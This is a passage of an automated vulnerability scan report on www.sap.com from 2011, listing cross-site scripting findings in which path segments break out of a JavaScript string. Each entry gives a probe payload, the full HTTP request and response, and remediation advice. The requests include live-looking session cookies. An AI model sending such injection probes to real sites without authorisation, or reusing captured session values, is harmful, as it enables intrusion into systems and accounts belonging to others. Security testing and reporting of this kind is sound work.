Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:01:11 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:01:11 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:01:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalb07cd';ec4edde2e02';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.95. http://www.sap.com/global/ui/css/securelayers.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/css/securelayers.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b671c'%3b543226d3f77 was submitted in the REST URL parameter 1. This input was echoed as b671c';543226d3f77 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalb671c'%3b543226d3f77/ui/css/securelayers.css HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/css,*/*;q=0.1
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34237
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalb671c';543226d3f77';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.96. http://www.sap.com/global/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-1.ttf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-1.ttf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c407'%3ba024c6ca314 was submitted in the REST URL parameter 1. This input was echoed as 9c407';a024c6ca314 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global9c407'%3ba024c6ca314/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-1.ttf HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=check#true#1321210929|session#1321210845752-117832#1321212729

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34479
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:02:22 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:02:22 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:02:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global9c407';a024c6ca314';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.97. http://www.sap.com/global/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-3.woff [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-3.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9aed'%3baf99673ff4a was submitted in the REST URL parameter 1. This input was echoed as a9aed';af99673ff4a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globala9aed'%3baf99673ff4a/ui/fonts/90a77a6d-79fe-4845-96a8-b6dadd7d52a4-3.woff HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=check#true#1321210929|session#1321210845752-117832#1321212729

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34486
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; domain=.sap.com; expires=Tue, 12-Nov-2013 19:17:50 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:17:50 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:17:49 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globala9aed';af99673ff4a';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.98. http://www.sap.com/global/ui/js/common.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/common.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e93a'%3bcbcf73c2e51 was submitted in the REST URL parameter 1. This input was echoed as 2e93a';cbcf73c2e51 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global2e93a'%3bcbcf73c2e51/ui/js/common.js?r=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:01:33 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:01:33 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:01:32 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global2e93a';cbcf73c2e51';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.99. http://www.sap.com/global/ui/js/functionsandplugins.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/functionsandplugins.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a3df'%3b7dc9d8a7f02 was submitted in the REST URL parameter 1. This input was echoed as 6a3df';7dc9d8a7f02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global6a3df'%3b7dc9d8a7f02/ui/js/functionsandplugins.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34273
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:12 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:11 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global6a3df';7dc9d8a7f02';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.100. http://www.sap.com/global/ui/js/head.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/head.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d6ae'%3bca47a3e20cd was submitted in the REST URL parameter 1. This input was echoed as 7d6ae';ca47a3e20cd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global7d6ae'%3bca47a3e20cd/ui/js/head.js?r=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33897
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:01:29 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:01:29 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:01:28 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global7d6ae';ca47a3e20cd';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.101. http://www.sap.com/global/ui/js/jquery-ui.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/jquery-ui.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8c79'%3b413038ff152 was submitted in the REST URL parameter 1. This input was echoed as c8c79';413038ff152 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globalc8c79'%3b413038ff152/ui/js/jquery-ui.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34187
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:11 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:11 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='globalc8c79';413038ff152';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.102. http://www.sap.com/global/ui/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 673b1'%3b54f56dbaa52 was submitted in the REST URL parameter 1. This input was echoed as 673b1';54f56dbaa52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /global673b1'%3b54f56dbaa52/ui/js/jquery.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34166
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 13 Nov 2011 19:03:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='global673b1';54f56dbaa52';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

1.103. http://www.sap.com/global/ui/js/mbox.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /global/ui/js/mbox.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a05b7'%3b45b4788a8c7 was submitted in the REST URL parameter 1. This input was echoed as a05b7';45b4788a8c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /globala05b7'%3b45b4788a8c7/ui/js/mbox.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=52383e4a-d615-4153-a2b4-311fe768b4c7; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 34136
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
